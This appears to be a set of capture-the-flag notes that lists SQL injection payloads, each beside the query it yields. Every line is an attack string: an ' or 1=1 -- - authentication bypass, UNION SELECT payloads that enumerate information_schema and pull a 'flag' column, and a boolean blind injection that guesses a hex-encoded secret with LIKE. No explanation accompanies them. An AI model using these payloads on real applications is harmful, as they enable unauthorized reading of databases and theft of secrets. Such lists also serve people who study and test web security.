something' or 1=1 -- -          
SELECT * FROM dummy_data WHERE id='something' or 1=1 -- -'

1' union select 1,version(),3,4,5,'6
SELECT * FROM dummy_data WHERE id='1' union select 1,2,3,4,5,'6'

1' UNION SELECT table_name, column_name,3,4,5,6 FROM information_schema.columns WHERE  '1'='1
SELECT * FROM dummy_data WHERE id='1' UNION SELECT table_name, column_name,3,4,5,6 FROM information_schema.columns WHERE  '1'='1'

1' UNION SELECT 1, flag,3,4,5,6 FROM real_data WHERE  '1'='1
1' UNION SELECT 1, flag,3,4,5,6 FROM real_data WHERE  '1'='1

1' and (select 1 where 1=1)='1
SELECT * FROM main WHERE id='1' and (select 1 where 1=1)='1'

1' and (select 1 from secret where hex(asecret) LIKE 'guess%')='1
SELECT * FROM main WHERE id='1' and (select 1 from secret where hex(asecret) LIKE 'guess%')='1'